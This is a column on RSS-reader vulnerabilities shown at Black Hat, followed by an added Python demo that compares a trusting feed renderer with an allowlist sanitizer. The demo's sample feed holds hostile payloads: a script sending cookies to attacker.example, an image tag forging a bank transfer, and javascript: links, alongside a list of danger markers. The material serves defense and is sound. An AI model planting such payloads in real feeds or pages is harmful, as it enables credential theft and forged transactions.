TECHSPLOITATION Last week at the infamous computer security conference Black Hat in Las Vegas, Bob Auger announced what should have already been obvious: reading blogs isn't safe. A security engineer with SPI Labs, Auger quietly revealed (www.spidynamics.com/assets/documents/HackingFeeds.pdf) that the mere act of checking out somebody's RSS feed could allow bad guys to steal money from your bank account, post Web spam from your computer, and snoop on everything you've written anonymously in that online porn community you secretly visit. This is the new dark side of all that nice free speech that’s been enabled by bloggish technologies.
Generally, free expression advocates worry about how businesses and governments censor the confessional, unedited style of bloggers. And they're right to be concerned. People posting personal rants have gotten fired for writing mean things about their bosses and been sued for criticizing litigious maniacs. But these bloggers are facing traditional retribution for speaking openly. They say bad things about someone or some corporate entity, and that person or entity smacks them down.
As Auger and other researchers demonstrated at Black Hat, we're about to see a new threat to free expression. Massive groups of people will be punished not for what they say online but for using particular tools to say it. Auger researched several popular RSS readers — programs used to pull blog content onto your computer — including Bloglines, RSS Reader, FeedDemon, and SharpReader, and discovered that many of them displayed whatever HTML and script a feed contained, exactly as the feed's author (or a commenter) wrote it. That turns the feed into a delivery system for malicious code designed to make the reader's computer, for example, post spam on other people's blogs.
Known generally as "cross-site scripting" and "cross-site request forgery," the attacks work because the reader treats the feed's contents as trusted. In the first, script hidden in a feed entry runs inside your reader with your privileges, so it can read what you see and type and quietly send it somewhere else. In the second, the entry makes your browser send requests to other Web sites, which honor them because you are already logged in there. And it could get worse than spamming. As Auger pointed out, script running in your reader could capture everything you type into your banking Web site and repost it elsewhere, handing the bad guys your passwords and letting them have fun with your money.
And blogs can spread their malicious code as quickly as they spread news. If I were a bad guy and wanted to steal a bunch of passwords, I would hide some malicious code inside a comment on a popular blog whose feed carries its comments. As soon as your reader displayed that comment, the code would run. Or I would start a blog that sounded particularly interesting (or pornographic), tempt a bunch of people into subscribing to my feed, and inject naughty code into their computers that way. When you consider how many people automatically repost other people's feeds onto their own blogs in a "what I'm reading" section or something like that, it's clear how bad things could get: every site that republishes the poisoned entry passes the code along to its own readers.
But even worse, in the process of using the Web's fastest free-speech engine to wreak havoc, the people injecting nasty code into blog feeds could undermine free speech itself.
Feed injection poses a whole new set of problems for people who want to promote free expression. We're dealing with a mechanism of censorship that isn't even aware of itself as such. People who do these hacks may not have our best interests in mind — they’re trying to lie, cheat, and steal — but as an unintended consequence, they may also choke off a powerful avenue of open communication. If people begin to associate using blogs and feeds with being ripped off and spied on, many may stop reading them. Government and business couldn't have asked for a better self-censorship catalyst. Speaking out, no matter what you say, will turn you into a victim.
Luckily, there are fixes for the speech-stopping problems that Auger found — just as there are legal and social remedies for traditional forms of censorship. After talking with Auger, developers at Bloglines fixed many of the bugs he pointed out. Other vendors are working on fixing them too. And the fixes for cross-site scripting and cross-site request forgery are already well understood from Web browsers and Web applications: treat feed content as untrusted input, strip or escape its script and event handlers before displaying it, and have sites require a token that a forged request coming from someone's feed reader cannot supply.
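The attack described above (a feed entry or blog comment carrying script that the reader renders, plus an "image" whose address is really a request to another site) and the kind of fix the vendors are applying can be seen side by side in the Python below. It is an example added to this column, not code from SPI Labs' paper or from any of the readers named. The feed, the hostnames (blog.example, attacker.example, bank.example) and the payloads are constructed for the demonstration; render_unsafe is what a trusting reader does, and render_safe is an allowlist sanitizer that treats feed HTML as untrusted input.

```python
# Added example for this column: a trusting feed renderer beside an allowlist
# sanitizer.  Not SPI Labs' code or any named reader's internals; the feed,
# hostnames and payloads are constructed for the demonstration.
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed feed: one entry whose <description> carries the payloads the column
# describes -- a cookie-stealing script, an inline event handler, a javascript:
# link, and an "image" that is really a request to a banking site.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Example blog</title>
<item>
<title>Harmless-looking post</title>
<link>http://blog.example/post/1</link>
<description><![CDATA[<p>Read <a href="http://blog.example/post/1">my post</a>.</p>
<script>document.location='http://attacker.example/?c='+document.cookie</script>
<img src="http://bank.example/transfer?to=attacker&amp;amount=1000" onerror="alert(1)">
<a href="javascript:alert(document.cookie)" onmouseover="alert(1)">hover me</a>]]></description>
</item></channel></rss>"""

ALLOWED_TAGS = {"p", "a", "b", "i", "em", "strong", "br", "img", "ul", "ol", "li", "blockquote"}
URL_ATTRS = {"a": "href", "img": "src"}  # the only attributes that survive, per tag
VOID_TAGS = {"br", "img"}
DANGER_MARKERS = ("<script", "onerror=", "onmouseover=", "javascript:", "bank.example")

def feed_items(xml_text):
    """Return (entry link, raw description HTML) for every <item> in an RSS 2.0 feed."""
    root = ET.fromstring(xml_text)
    return [(it.findtext("link", ""), it.findtext("description", "")) for it in root.iter("item")]

def render_unsafe(item_link, description):
    """A trusting reader: the feed's HTML goes to the browser untouched, so whatever
    a blogger or commenter wrote runs with the reader's privileges."""
    return description

class _Sanitizer(HTMLParser):
    """Rebuilds an entry from an allowlist of tags and URLs; everything else is dropped."""

    def __init__(self, item_host):
        super().__init__(convert_charrefs=True)
        self.item_host = item_host
        self.out = []
        self.skip_depth = 0  # > 0 inside <script>/<style>, whose text is discarded

    def _safe_url(self, tag, url):
        parsed = urlparse(url.strip())
        if parsed.scheme not in ("http", "https"):
            return None  # rejects javascript:, data:, vbscript: and friends
        # An <img> is a request the browser makes with the user's cookies; only load
        # images from the entry's own host so a feed can't aim them at a bank (CSRF).
        if tag == "img" and parsed.hostname != self.item_host:
            return None
        return url

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown element: drop the tag but keep its text
        kept = []
        for name, value in attrs:  # on*, style, class, ... never reach `kept`
            if name == URL_ATTRS.get(tag) and value is not None:
                url = self._safe_url(tag, value)
                if url is not None:
                    kept.append(f' {name}="{html.escape(url, quote=True)}"')
        if tag == "img" and not kept:
            return  # an image with no acceptable source is dropped entirely
        if tag == "a" and kept:
            kept.append(' rel="noopener noreferrer"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

def render_safe(item_link, description):
    """Treat feed HTML as untrusted input: allowlist tags and URLs before display."""
    sanitizer = _Sanitizer(urlparse(item_link).hostname)
    sanitizer.feed(description)
    sanitizer.close()
    return "".join(sanitizer.out)

def dangerous_markers(rendered_html):
    """Crude audit for the demo: which constructed payloads survived rendering?"""
    lowered = rendered_html.lower()
    return [m for m in DANGER_MARKERS if m in lowered]

if __name__ == "__main__":
    link, description = feed_items(SAMPLE_FEED)[0]
    print("trusting reader leaves:", dangerous_markers(render_unsafe(link, description)))
    print("sanitizing reader leaves:", dangerous_markers(render_safe(link, description)))
```

Run as a script, the trusting renderer reports all five payload markers surviving while the sanitizer reports none; what reaches the browser is the paragraph, the genuine link (with rel="noopener noreferrer" added) and the words "hover me" stripped of their javascript: target. Refusing images from any host other than the entry's own is a design choice that covers the request-forgery half on the client side; the server-side complement, which this example does not show, is for the bank or blog to require a per-session token on state-changing requests.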